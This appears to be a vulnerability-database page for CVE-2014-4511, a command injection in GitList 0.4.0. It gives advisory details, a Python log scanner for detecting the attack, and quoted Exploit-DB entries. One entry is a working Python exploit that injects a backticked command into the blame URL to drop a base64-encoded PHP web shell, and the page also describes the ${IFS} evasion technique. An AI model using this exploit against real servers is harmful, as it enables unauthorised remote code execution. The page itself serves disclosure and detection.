CVE-2014-4511
Published 2014-07-22
Priority P2 · 75 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 82.73% · 99.6th percentile
Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gitlist | gitlist | <= 0.4.0 | — |
| gitlist | gitlist | — | — |
| gitlist | gitlist | — | — |
| gitlist | gitlist | — | — |
Detection & IOCs
- The exploit requires no authentication; there are no credentials or session tokens to filter on — detection must rely entirely on URI pattern matching.
- The payload space is limited to 8192 bytes (max GET request length) and bad characters include '&' and space (0x20), so payloads use ${IFS} as a space substitute — detection should account for this evasion.
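The URI pattern matching described in the two points above, as an added example that is not part of the original page or of the referenced modules: it percent-decodes each request path, restricts matching to the blame, file and stats routes named in the advisory, and flags shell metacharacters including `${IFS}`. The combined-log format, the `master` branch, the `/gitlist/demo` prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Routes named in the advisory: blame/master/, stats/master/ and the file view master/.
# Assumption: the branch is "master"; extend the pattern for other branch names.
ROUTE = re.compile(r"/(?:blame/|stats/)?master/(?P<name>.*)$", re.S)
# Shell metacharacters that should never reach git inside a file name.
META = re.compile(r"`|\$\(|\$\{?IFS\}?|[;|<>\n]")
REQUEST = re.compile(r'"(?:GET|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not taken from a real server).
SAMPLE = [
    '10.0.0.5 - - [01/Jul/2014:10:00:00 +0000] "GET /gitlist/demo/blame/master/README.md HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jul/2014:10:00:05 +0000] "GET /gitlist/demo/blame/master/%22%22%60CMD%60 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jul/2014:10:00:07 +0000] "GET /gitlist/demo/stats/master/a$%7BIFS%7Db HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jul/2014:10:00:09 +0000] "GET /gitlist/demo/master/x%2560CMD%2560 HTTP/1.1" 404 0',
]


def decode(uri, rounds=3):
    """Percent-decode repeatedly so double encoding (%2560 -> %60 -> `) is caught."""
    for _ in range(rounds):
        nxt = unquote(uri)
        if nxt == uri:
            break
        uri = nxt
    return uri


def suspicious(log_line):
    """Return the first metacharacter found in a GitList file name, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path = decode(m.group("uri").split("?", 1)[0])  # the file name is in the path
    route = ROUTE.search(path)
    if not route:
        return None
    hit = META.search(route.group("name"))
    return hit.group(0) if hit else None


def scan(lines):
    """Return (line_number, matched_token) for every suspicious line."""
    return [(i, t) for i, line in enumerate(lines, 1) if (t := suspicious(line))]


if __name__ == "__main__":
    for lineno, token in scan(SAMPLE):
        print(f"line {lineno}: metacharacter {token!r} in GitList file name")
```

Because the exploit needs no authentication, the response status and source address are not used as filters here; any match on these routes is worth reviewing.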
No detection rules found.
Exploit-DB
Gitlist - Remote Command Execution (Metasploit)
exploitdb·2014-07-07
CVE-2014-4511 Gitlist - Remote Command Execution (Metasploit)
---
```ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Gitlist Unauthenticated Remote Command Execution',
  'Description' => %q{
    This module exploits an unauthenticated remote command execution vulnerability
    in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
    crafted file name when trying to blame it.
  },
  'License' => MSF_LICENSE,
  'Privileged' => false,
  'Platform' => 'unix',
  'Arch' => ARCH_CMD,
  'Author' =>
    [
      'drone', #discovery/poc by @dronesec
      'Brandon Perry ' #Metasploit module
    ],
  'References' =>
    [
      ['CVE', '2014-4511'],
      ['EDB', '33929'],
      ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitl
```
Exploit-DB
Gitlist 0.4.0 - Remote Code Execution
exploitdb·2014-06-30·CVSS 7.5
CVE-2014-5023 [HIGH] Gitlist 0.4.0 - Remote Code Execution
---
```python
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist 2:
path = sys.argv[2]
print '[!] Using cache location %s' % path
# payload
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out
```
Metasploit
Gitlist Unauthenticated Remote Command Execution
metasploit
This module exploits an unauthenticated remote command execution vulnerability in version 0.4.0 of Gitlist. The problem exists in the handling of a specially crafted file name when trying to blame it.
No writeups or analysis indexed.
- http://hatriot.github.io/blog/2014/06/29/gitlist-rce/
- http://packetstormsecurity.com/files/127281/Gitlist-0.4.0-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/127364/Gitlist-Unauthenticated-Remote-Command-Execution.html
- http://www.exploit-db.com/exploits/33929
- http://www.exploit-db.com/exploits/33990
- https://groups.google.com/forum/#%21topic/gitlist/Hw_KdZfA4js